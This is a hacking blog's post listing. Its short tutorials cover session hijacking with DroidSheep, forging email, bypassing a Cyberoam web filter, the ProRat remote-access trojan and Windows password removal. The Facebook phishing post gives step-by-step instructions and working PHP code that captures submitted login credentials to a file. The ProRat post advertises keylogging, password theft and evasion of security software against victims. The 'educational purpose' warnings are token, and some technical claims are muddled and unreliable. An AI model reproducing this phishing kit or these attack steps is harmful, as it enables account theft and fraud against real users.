Posts

HOW TO FIND HIDDEN PASSWORD UNDER ASTERISKS

Image
Welcome to "BLACKBACKHAKERS - An approach to introduce people with the truth of HACKING". Often we use the " Remember Me " feature in most form logins to help the signing in process faster. But taking advantage of that sometimes makes us forget what our real passwords are. If you often stare at the asterisks and wonder what’s your actual password, try this trick. Thais trick only work for Mozilla Firefox. Add on  :   Show My Password To reveal password under asterisks just double click on text box where password is saved.

HOW TO HACK FACEBOOK, TWITTER WITH ANDROID APP DROIDSHEEP

Image
Welcome again to "BLACKBACKHAKERS - An approach to introduce people with the truth of HACKING".  DriodSheep  is awesome Session Hijacking Android app that can be use to hijack Wifi Sessions. Currently It support  Open  and  WEP Encrypted networks  that includes  WPA and WPA2 networks (PSK)  DroidSheep enables Android-based man in the middle attacks against a wide range of Web sites, including Facebook.com, Flickr.com, Twitter.com, Linkedin.com, and non-encrypted services like “maps” on Google. There are many users that do not known that air is the transmission medium when using WiFi. Therefore information is not only transferred to its receiver but also to any other party in the network within the range of the radio waves.  Usually nothing special happens because the WiFi users discard packets that are not destined to themselves. DroidSheep does not do this. It reads all the packets looking at their contents. Is a website sending a clear recognition feature with

HOW TO SEND FAKE E-MAIL

Image
Today in this post I'll tell you how can you send fake and anonymous mails to any one. This technique is called E-MAIL FORGING.  E-MAIL FORGING is a art to sending fake emails without knowing the password of victim. WARNING : This article is only for educational purpose don't misuse this.  www.emkei.cz  - SEND FAKE E-MAIL  is the fabulous online website, used to send fake and anonymous email.  All Sent e-mails go to INBOX.  Click on link :   www.emkei.cz   WARNING :  By sending a fake email or prank email you may be committing the offence of fraud even you did not intend to. You are not allowed to use this service for any  illegal activities  at any time.

Hack Cyberoam to Access all blocked sites

Image
How to Hack Cyberoam to Access all blocked sites in college/firm Hello Frens I am back with another hacking tutorial . This time I will explain you all " How to  Hack  or Unblock cyberoam  to access all blocked sites in college or company" . Tutorial will be noob friendly as everything is explained with the help of snapshots...So to know How to hack  cyberoam  Read On.... First of all Guys You Must Know What is Cyberoam and What Idea it uses to block the user. What is Cyberoam : Cyberoam is Identity-based unified threat management appliances, offer comprehensive threat protection with firewall-VPN, anti-virus, anti-spam, intrusion prevention system, content filtering in addition to bandwidth management and multiple link load balancing and gateway failover. Identity-based controls and visibility are critical components of network security. With identity and network data combined, enterprises are able to identify patterns of behavior by specific users or groups

Facebook Hacking via phishing pages

Image
The ways the easiest and most commonly use way of hacking a Facbook account is Phoshing. Now Learn how to Make a Phishing Page. Do as I tell you step by step. Step1:  Goto  www.facebook.com/login.php Step2 :  Save the file to your desktop  with photos  with name  login.php Step3 :  Open the html file with  notepad . Step4 :  Now search for  form method="POST"  and replace it with  form method="GET" Step5 :  And next is replacing  action =" https://login.facebook.com/login.php?login_attempt=1 " with action="lol.php" Step6 : now open a notepad and type following as it is. <?phpheader ('Location: http://www.facebook.com');$handle = fopen("lol.txt", "a");foreach($_POST as $variable => $value) {   fwrite($handle, $variable);   fwrite($handle, "=");   fwrite($handle, $value);   fwrite($handle, "\r\n");}fwrite($handle, "\r\n");fclose($handle);exit;?>

Key Logging with ProRat

Image
ProRat is maded by PRO Group and free to use for everyone.  The Latest version is  ProRat_v1.9_Fix2. Features: Full control over files  Drive formatting Key Logging and Screenshots Stealing passwords Open/close CD tray Hide taskbar, desktop, and start button Writing on-screen Movement of cursor View system information Access webcam Download & run files Infection Method: ProRat creates a server(undetected by antivirus and firewall software).  This server is able to run stealthily in the background. After server is created, it will be send to victim. Once the server is started to run in victim system, it wil bring the control to the Attacker.  The software runs completely (including rootkit) in Windows, and such features include killing security software, removing and disabling system restore points, and displaying a fake error message to mislead the victims.  Screenshot: Editions: ProGroup produced some of their programs to all users (Public Edition) and some of

Windows Password Killer Tool

Image
I have explained how to recover the lost password using Backtrack Password Cracking. Here i am going to introduce a new tool named as Windows Password Killer. It enables you remove windows 7 password to reset the administrator, standard user and guest passwords easily without any data losing or file damage. There is 3 different editions - the Lite, Pro and Ultimate, here we take the Pro edition as an example for the password remove process with USB drive (CD/DVD also supported too). Requirements: 1. Any Accessible Computer. 2.USB Drive or CD/DVD Step 1:  Install Password Killer Download the Windows Windows Password Killer from  Here.   Install the windows Password Killer in your friends or any accssible computer. Step 2: Burn a bootable CD/DVD or an USB drive Insert the USB Drive or CD/DVD. Run the Windows Password Killer. Select the USB drive or CD/DVD. click the Create button. It will ask you to verify whether you select correct disk or not. Click "Yes" button